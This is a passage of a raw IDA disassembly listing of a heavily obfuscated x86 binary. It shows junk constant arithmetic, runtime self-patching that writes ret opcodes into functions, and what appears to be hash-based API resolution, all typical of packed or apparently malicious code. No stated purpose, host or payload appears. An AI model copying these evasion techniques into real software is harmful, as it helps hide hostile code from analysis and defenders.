; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
		add	edi, 426A0C7Dh
		jmp	sub_43D823
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478AB

loc_4528E0:				; CODE XREF: sub_4478AB+D9D4j
		call	sub_444FB1
		mov	eax, 0A4C05BA6h
		call	sub_4553CC
		mov	ds:dword_41E180, eax
		lea	eax, nullsub_22
		jmp	loc_456C4C
; END OF FUNCTION CHUNK	FOR sub_4478AB
; ---------------------------------------------------------------------------

loc_452900:				; CODE XREF: k2vbe3.d:loc_4548C5j
					; k2vbe3.d:004548E0j
		xor	esi, 0E839DC57h
		add	esi, 9804F4C7h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_45634D
		mov	byte ptr [eax],	0C3h
		jmp	loc_456226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45634D

loc_45291D:				; CODE XREF: sub_45C041:loc_4507BFj
					; sub_45634Dj
		pop	edx
		jmp	loc_44B6D4
; END OF FUNCTION CHUNK	FOR sub_45634D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_452923:				; CODE XREF: sub_43CCD0+18A1Cj
		push	eax
		mov	eax, esi
		xchg	eax, [esp+8+var_8]
		mov	esi, eax
		xchg	esi, [esp+8+var_8]
		call	dword ptr [ebp-4]
		test	eax, eax
		jz	loc_446C00
		jmp	loc_448EAB
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_45293E:				; CODE XREF: k2vbe3.d:00453FC1j
		shr	ebx, 4

; =============== S U B	R O U T	I N E =======================================



sub_452941	proc near		; CODE XREF: sub_455C7A-129F3p
		xchg	edx, [esp+0]
		pop	edx
		add	eax, ebp
		add	eax, 5EB00520h
		mov	eax, [eax]
		jmp	loc_45A9C0
sub_452941	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_452954:				; CODE XREF: sub_44DF16-F993j
		jz	loc_456A3D
		adc	eax, 14D6B8FDh
		jmp	loc_456A3B
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447594

loc_452965:				; CODE XREF: sub_447594:loc_454B0Bj
		popf
		call	sub_444D7B

loc_45296B:				; CODE XREF: sub_43ED1F-1AF6j
		jmp	sub_442D04
; END OF FUNCTION CHUNK	FOR sub_447594
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_452970:				; CODE XREF: sub_444D7B-D6Fj
					; sub_444D7B+7EE5j
		rol	eax, 1
		test	eax, 8
		jmp	loc_45B128
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_45297D:				; CODE XREF: k2vbe3.d:0045B7FEj
		jnz	loc_43E6B1
		jmp	loc_459247
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_452988:				; CODE XREF: sub_457D4B+2FC2j
		or	ecx, 8EE09300h
		add	ecx, 7161F66Eh
		xchg	ecx, [esp+0]
		jmp	loc_43C352
; END OF FUNCTION CHUNK	FOR sub_457D4B

; =============== S U B	R O U T	I N E =======================================



sub_45299C	proc near		; CODE XREF: k2vbe3.d:00453935j
					; sub_443528+11F17p
		xchg	ebx, [esp+0]
		pop	ebx
		jnz	loc_4529AC
		mov	eax, [ebp-4]

loc_4529A9:				; CODE XREF: k2vbe3.d:00459FA6j
		mov	[ebp-8], eax

loc_4529AC:				; CODE XREF: sub_45299C+4j
		call	sub_458905
		jmp	loc_4508C0
sub_45299C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4529B6:				; CODE XREF: sub_44C90E:loc_445F63j
					; sub_44C90E+4ACDj
		push	esi
		push	0A173E93Bh
		pop	esi
		sub	esi, 2A5AAEEBh
		jmp	loc_44B641
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		ror	edi, 13h
		not	eax
		jmp	sub_44945C

; =============== S U B	R O U T	I N E =======================================



sub_4529D2	proc near		; CODE XREF: k2vbe3.d:004488DEj
					; sub_45B20A+1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C5F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454CBC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455146 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004572BB SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx

loc_4529D6:				; CODE XREF: k2vbe3.d:0044B089j
		mov	ebp, esp
		call	sub_45B029

loc_4529DD:				; CODE XREF: sub_43F7AC+3403j
		jmp	loc_455146
sub_4529D2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4529E2	proc near		; CODE XREF: k2vbe3.d:0044629Cj
					; sub_44921C+B1DBp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C15B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043CB90 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043F0BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004437E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443881 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004438A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443BA4 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00444263 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044523E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044676A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00448485 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044852D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00448583 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00449BE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EFF6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F035 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044F447 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044F4DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045048A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453014 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454110 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454B5B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454C83 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00456577 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004572E5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458DA4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004599BD SIZE 00000012 BYTES

		xchg	eax, [esp+0]
		pop	eax
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-28h]
		mov	byte ptr [eax],	0
		inc	dword ptr [ebp-24h]
		jmp	loc_444263
sub_4529E2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4529F7:				; CODE XREF: sub_4424CF:loc_44DBF7j
		jz	loc_44B1AF
		jmp	loc_44C9D4
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------

loc_452A02:				; CODE XREF: k2vbe3.d:loc_44DD7Bj
		js	loc_441D81
		jmp	loc_43D321
; ---------------------------------------------------------------------------
		xor	ebp, esi
		jmp	sub_45A992
; ---------------------------------------------------------------------------

locret_452A14:				; CODE XREF: k2vbe3.d:0044ACD7j
		retn
; ---------------------------------------------------------------------------

loc_452A15:				; CODE XREF: k2vbe3.d:00455632j
		jmp	locret_44D403
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_452A1A:				; CODE XREF: sub_44FF97-10998j
		jmp	loc_44B839
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2DF

loc_452A1F:				; CODE XREF: sub_44A2DF:loc_455994j
		pop	eax
		add	eax, 21C2F789h
		test	eax, 100000h
		jmp	loc_44D680
; END OF FUNCTION CHUNK	FOR sub_44A2DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_452A31:				; CODE XREF: sub_45156D:loc_44EAF8j
		xchg	ebp, [esp-4+arg_0]
		call	sub_45C233

loc_452A39:				; CODE XREF: sub_44E481+C2B4j
		jmp	loc_459688
; END OF FUNCTION CHUNK	FOR sub_45156D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_452A3E:				; CODE XREF: sub_440EE3:loc_43DD71j
					; k2vbe3.d:004505A0j
		call	sub_453521
		jmp	loc_442959
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------

loc_452A48:				; CODE XREF: k2vbe3.d:0044FCD5j
		jmp	loc_4492A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_452A4D:				; CODE XREF: sub_43FE0A+17D7Dj
		shl	dword ptr [ebp-8], 8

loc_452A51:				; CODE XREF: sub_43FE0A-39FFj
					; k2vbe3.d:00441DF6j ...
		jnb	loc_45232F
		mov	eax, [ebp-0Ch]
		cmp	byte ptr [eax],	0
		jnz	loc_45C258
		mov	eax, [ebp-8]
		shl	eax, 3
		add	[ebp-8], eax
		jmp	loc_44BD9B
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------

locret_452A71:				; CODE XREF: k2vbe3.d:loc_44A0A8j
		retn
; ---------------------------------------------------------------------------

loc_452A72:				; CODE XREF: k2vbe3.d:0044E817j
		jmp	locret_45B21A
; ---------------------------------------------------------------------------
		call	sub_4575BD

loc_452A7C:				; DATA XREF: sub_44C90E:loc_44A4C5o
		cmp	dword ptr [ebp-108h], 6C436E6Fh
		jnz	loc_459FE1
		jmp	loc_44EA56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_452A91:				; CODE XREF: sub_458F1C-11C5Fj
		mov	byte ptr [eax],	0C3h
		jmp	sub_458F1C
; END OF FUNCTION CHUNK	FOR sub_458F1C
; ---------------------------------------------------------------------------
		call	nullsub_257
		jmp	ds:dword_41E058
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_452AA4:				; CODE XREF: sub_44CA34:loc_457421j
		jmp	sub_44081A
; END OF FUNCTION CHUNK	FOR sub_44CA34
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_257. PRESS KEYPAD	"+" TO EXPAND]
		dw 0CD89h
		dd 5AFFFEFEh, 5224048Bh, 0FFFF8AE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_452AB9:				; CODE XREF: k2vbe3.d:00448A52j
		not	esi
		cmp	eax, ebp
		jmp	loc_44F2F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_215. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D6A

loc_452AC3:				; CODE XREF: sub_440D6A+Cj
		jmp	loc_43FFF0
; END OF FUNCTION CHUNK	FOR sub_440D6A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_452AC8:				; CODE XREF: sub_43F7AC:loc_45B358j
		add	edx, 3086D245h
		jns	loc_4550AA

loc_452AD4:				; CODE XREF: sub_4539B3-8E3Aj
		jmp	loc_43E4BD
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
		jbe	loc_44960C
		mov	edx, [eax]
		sbb	ecx, 0D8BD272Bh
		not	esi
		jmp	loc_456980
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_452AEE:				; CODE XREF: sub_447E07+14CAj
		jz	loc_447F9C
		jmp	loc_45BD62
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_452AF9:				; CODE XREF: k2vbe3.d:loc_4436F2j
		pop	ecx
		rol	ecx, 1Fh
		and	ecx, 7E093C83h
		add	ecx, 9DE93B6Eh
		or	ecx, 0A462ADFCh
		jmp	loc_449C59
; ---------------------------------------------------------------------------

loc_452B14:				; CODE XREF: k2vbe3.d:0044BABDj
		jp	loc_44F419

; =============== S U B	R O U T	I N E =======================================



sub_452B1A	proc near		; CODE XREF: k2vbe3.d:0045A015p
		xchg	ecx, [esp+0]
		pop	ecx
		or	eax, eax

loc_452B20:				; CODE XREF: k2vbe3.d:00456298j
		jnz	loc_45AD21
		jmp	loc_4523F7
sub_452B1A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_452B2B:				; CODE XREF: sub_4423D2+57D1j
					; sub_4423D2:loc_45772Dj
		call	sub_44EBBF

loc_452B30:				; CODE XREF: k2vbe3.d:004599FFj
		jmp	loc_43C89E
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------

loc_452B35:				; CODE XREF: k2vbe3.d:loc_44AFF3j
		jmp	loc_45A57D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_452B3B:				; CODE XREF: sub_4481FA+Ej
		jmp	loc_44E985
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------

loc_452B40:				; CODE XREF: k2vbe3.d:loc_44122Cj
		or	ebp, ecx
		sbb	ebx, ecx
		push	43EE24C7h
		jmp	loc_446E75
; ---------------------------------------------------------------------------

loc_452B4E:				; CODE XREF: k2vbe3.d:loc_4428C5j
		jz	loc_453F6E
		cdq
		jle	loc_441276
		jmp	loc_44C664
; ---------------------------------------------------------------------------

loc_452B60:				; CODE XREF: k2vbe3.d:loc_44C761j
		jz	loc_43FD92
		jmp	loc_440805
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_452B6B:				; CODE XREF: sub_44B912-862Fj
		add	esi, 605D6021h
		mov	[esi], eax
		pop	esi
		cmp	dword ptr [ebp-4], 0
		jz	loc_455177
		jmp	loc_45BF36
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_452B83:				; CODE XREF: k2vbe3.d:loc_4481D6j
					; sub_44E542+6136j
		mov	edx, 19EB5140h

loc_452B88:				; CODE XREF: sub_44E542:loc_447A47j
		push	ecx
		push	98F2DF9Ch
		pop	ecx
		rol	ecx, 6
		sub	ecx, 0C75A6884h
		add	ecx, 8AA2815Eh
		jmp	loc_43DBF8
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_452BA3:				; CODE XREF: sub_4424CF+71FEj
		jnz	loc_456185
		jmp	loc_44ECC9
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_452BAE:				; CODE XREF: sub_44B979+1D23j
		jnz	loc_451411
		jmp	loc_441758
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_452BB9:				; CODE XREF: k2vbe3.d:00444325j
		adc	esi, 0F46EF6D5h
		and	edx, ebp
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_452BC1:				; CODE XREF: sub_452D37:loc_444310j
		rol	edx, 1Bh
		sub	edx, 661D033Bh
		test	edx, 2000000h
		jmp	loc_44A009
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------

loc_452BD5:				; CODE XREF: k2vbe3.d:0045BE35j
		xor	ebx, edx
		add	edx, ebx
		mov	ebx, 0F4AF1C87h
		push	edi
		push	87008014h
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		jmp	loc_447F80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_452BEF:				; CODE XREF: sub_44BDBB+14j
		jz	loc_44F306
		jmp	loc_457ED7
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_452BFA:				; CODE XREF: sub_45AD42-567Bj
		add	eax, 448E9D6h
		rol	eax, 7
		xor	eax, 1F394C68h
		add	eax, ebp
		jmp	loc_44B003
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C46F

loc_452C10:				; CODE XREF: sub_44C46F:loc_44AB1Cj
		mov	[ebx], eax
		pop	ebx
		lea	eax, nullsub_3
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_3
; END OF FUNCTION CHUNK	FOR sub_44C46F

; =============== S U B	R O U T	I N E =======================================



sub_452C21	proc near		; CODE XREF: sub_41C77E+2D5p
					; sub_452C21+5j
					; DATA XREF: ...
		call	sub_45AB7E
		jmp	ds:off_41E084
sub_452C21	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_452C2C:				; CODE XREF: sub_4440B5+FD27j
		jmp	loc_452C78
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A28D

loc_452C31:				; CODE XREF: sub_44A28D+9j
		jmp	nullsub_446
; END OF FUNCTION CHUNK	FOR sub_44A28D
; ---------------------------------------------------------------------------

loc_452C36:				; CODE XREF: k2vbe3.d:004549E8j
		jle	loc_454502
		cdq
		pushf

loc_452C3E:				; CODE XREF: k2vbe3.d:loc_4549C4j
		sub	edi, 0C70F6063h
		and	edi, 5C4DBBC6h
		add	edi, 2E175h
		xchg	edi, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------

loc_452C58:				; CODE XREF: k2vbe3.d:00450B52j
		jl	loc_446FD9
		jl	loc_44D09B
		mov	edx, [ebp+0]
		and	eax, 0D0B53828h
		jb	loc_44AEAE
		jmp	loc_446FD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_452C78:				; CODE XREF: sub_4440B5:loc_452C2Cj
		add	ecx, 4CD7CFF7h
		xchg	ecx, [esp+8+var_8]
		jmp	sub_4479A1
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44655E

loc_452C86:				; CODE XREF: sub_44655E:loc_454AC0j
		xchg	edx, [esp+0]
		jmp	loc_443856
; END OF FUNCTION CHUNK	FOR sub_44655E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FAE2

loc_452C8E:				; CODE XREF: sub_43FAE2:loc_443976j
		call	sub_453347

loc_452C93:				; CODE XREF: sub_43FAE2+14j
					; sub_45B029-1863Aj ...
		call	sub_443B55

loc_452C98:				; CODE XREF: k2vbe3.d:004588E1j
		pushf
; END OF FUNCTION CHUNK	FOR sub_43FAE2

; =============== S U B	R O U T	I N E =======================================



sub_452C99	proc near		; CODE XREF: sub_43CD01+6C55p

; FUNCTION CHUNK AT 00443AF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C9CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E93 SIZE 00000019 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	15CA73A9h
		pop	ebx
		rol	ebx, 10h
		sub	ebx, 82F8AFDBh
		and	ebx, 0E9CD49AAh
		jmp	loc_44C9CF
sub_452C99	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_41E130, eax
		lea	eax, nullsub_250
		mov	byte ptr [eax],	0C3h
		jmp	loc_453CF8
; ---------------------------------------------------------------------------
		call	nullsub_526
		jmp	loc_455964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448B3

loc_452CD5:				; CODE XREF: sub_4448B3+10j
		mov	edx, ecx
		pop	ecx
		add	edx, 0A0910C36h
		xor	edx, 0FEC0E386h
		xor	eax, edx
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_4448B3
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_452CE7:				; CODE XREF: sub_44C90E:loc_45B8D7j
		rol	eax, 0Dh

loc_452CEA:				; CODE XREF: k2vbe3.d:loc_4473ACj
		sub	eax, 8B5AE45Dh
		jmp	loc_44CC31
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_452CF5:				; CODE XREF: k2vbe3.d:0044C23Dj
		xchg	ebp, ebx

; =============== S U B	R O U T	I N E =======================================



sub_452CF7	proc near		; CODE XREF: sub_45325Cp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C47A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E715 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044190C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444610 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004479F3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447D85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449E90 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E990 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454FB8 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00459365 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A53B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045C01A SIZE 0000001C BYTES

		xchg	esi, [esp+0]
		pop	esi
		jno	loc_45A53B
		jmp	loc_459365
sub_452CF7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_452D06:				; CODE XREF: sub_44A79B+2684j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_444A64
		jmp	loc_445536
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45725F

loc_452D15:				; CODE XREF: sub_45725F-15C7Fj
		mov	ds:off_41E038, eax
		lea	eax, sub_4427BF
		mov	byte ptr [eax],	0C3h
		jmp	loc_45BF76
; END OF FUNCTION CHUNK	FOR sub_45725F
; ---------------------------------------------------------------------------

loc_452D29:				; CODE XREF: k2vbe3.d:0044170Dj
		mov	eax, [esp]
		jmp	loc_458BE8
; ---------------------------------------------------------------------------

locret_452D31:				; CODE XREF: k2vbe3.d:0043CD7Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_452D32:				; CODE XREF: sub_44CA34-5ACFj
		jmp	loc_45BEB9
; END OF FUNCTION CHUNK	FOR sub_44CA34

; =============== S U B	R O U T	I N E =======================================



sub_452D37	proc near		; CODE XREF: sub_44E971-8957j
					; sub_44E0F6:loc_45BD01p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043FA85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FBBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044041F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044102A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444310 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A009 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B1F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BC6A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452BC1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452F9C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453A46 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454A39 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	edx
		push	35BEE88Eh
		pop	edx
		and	edx, 35CD6D1Fh
		jmp	loc_44102A
sub_452D37	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4412A1

loc_452D4D:				; CODE XREF: sub_4412A1:loc_4423B8j
		lea	eax, sub_450740
		mov	byte ptr [eax],	0C3h
		jmp	loc_453821
; END OF FUNCTION CHUNK	FOR sub_4412A1
; ---------------------------------------------------------------------------
		push	ecx
		push	77A2B361h
		pop	ecx
		xor	ecx, 43D11417h
		jmp	loc_43EE8C
; ---------------------------------------------------------------------------

loc_452D6D:				; DATA XREF: sub_44C49B-9510o
		mov	ds:off_41E13C, eax
		lea	eax, sub_44C49B
		mov	byte ptr [eax],	0C3h
		jmp	sub_44C49B

; =============== S U B	R O U T	I N E =======================================



sub_452D81	proc near		; CODE XREF: sub_40B4CD+10Fp
					; sub_40B4CD+126p ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C030 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004499BC SIZE 0000001C BYTES

		push	edx
		jmp	loc_43C030
sub_452D81	endp

; ---------------------------------------------------------------------------

loc_452D87:				; DATA XREF: sub_4526F4:loc_4526FBo
		mov	eax, [esp]
		push	edx
		push	ebx
		push	65EF3EF7h
		pop	ebx

loc_452D92:				; CODE XREF: k2vbe3.d:0044B921j
		xor	ebx, 7EDD6080h
		add	ebx, 3E51C0BCh
		jmp	loc_459BE6
; ---------------------------------------------------------------------------
		cmp	eax, 0E4C370E5h
		jmp	loc_454F98
; ---------------------------------------------------------------------------

loc_452DAE:				; CODE XREF: k2vbe3.d:00456333j
		xchg	edx, [esp]
		pop	edx
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_452DB3:				; CODE XREF: sub_4467A1-A0D8j
		call	sub_43ED1F
; END OF FUNCTION CHUNK	FOR sub_4467A1
; START	OF FUNCTION CHUNK FOR sub_444615

loc_452DB8:				; CODE XREF: sub_444615+Bj
		jmp	nullsub_133
; END OF FUNCTION CHUNK	FOR sub_444615
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_452DBD:				; CODE XREF: sub_43E135:loc_443F08j
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jnz	loc_441FFB
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_442982
; END OF FUNCTION CHUNK	FOR sub_43E135

; =============== S U B	R O U T	I N E =======================================



sub_452DD6	proc near		; CODE XREF: sub_44F028-AF21p
					; k2vbe3.d:00454F93j

; FUNCTION CHUNK AT 0044F5B8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00453291 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459D19 SIZE 00000017 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	ebx, ebp
		add	ebx, 0E329FDF2h
		mov	ebx, [ebx]
		jmp	loc_453291
sub_452DD6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	edx, 0F78D9DBDh
		call	sub_45B20A
		push	eax
		mov	eax, ebp
		xchg	eax, [esp]
		mov	ebp, eax
		jmp	loc_44CE89
; ---------------------------------------------------------------------------

loc_452E00:				; DATA XREF: k2vbe3.d:00457AD1o
		push	eax
		call	sub_448D3A
		or	eax, eax
		jnz	loc_45AA76
		jmp	loc_456FA9
; ---------------------------------------------------------------------------
		mov	eax, 205AA81Dh
		call	sub_4553CC
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp]
		push	0F47616Ah
		pop	ebx
		jmp	loc_43DE70
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E88E

loc_452E2E:				; CODE XREF: sub_43E88E:loc_449FE4j
		mov	eax, 5A4FBBBh
		call	sub_4553CC
		mov	ds:dword_41E0BC, eax
		lea	eax, nullsub_328
		jmp	loc_4573E0
; END OF FUNCTION CHUNK	FOR sub_43E88E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45282D

loc_452E49:				; CODE XREF: sub_45282D:loc_452846j
		jz	sub_441F56
		jmp	loc_43ED6C
; END OF FUNCTION CHUNK	FOR sub_45282D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_452E54:				; CODE XREF: sub_443A30:loc_44C7F8j
					; k2vbe3.d:loc_455326j
		jz	loc_455CD9
		pop	ebp
		test	esi, 0D8D9EEE9h
		jmp	loc_455CD3
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------

loc_452E66:				; CODE XREF: k2vbe3.d:loc_456D6Dj
		jge	loc_44751C
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_452E6C:				; CODE XREF: sub_44B912-199Cj
		jmp	nullsub_329
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		popf
		jmp	loc_44750D
; ---------------------------------------------------------------------------

loc_452E77:				; DATA XREF: k2vbe3.d:0044FDF7o
		mov	byte ptr [eax],	0C3h
		jmp	loc_441AF9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_452E7F:				; CODE XREF: sub_4440B5:loc_44644Aj
		mov	eax, [esp-4+arg_0]
		push	edx
		push	ecx
		push	16D41AB2h
		jmp	loc_453DCF
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_452E8E:				; CODE XREF: sub_45451C:loc_451A13j
		mov	ebx, ebp
		xchg	ebx, [esp+4+var_4]
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		push	esi

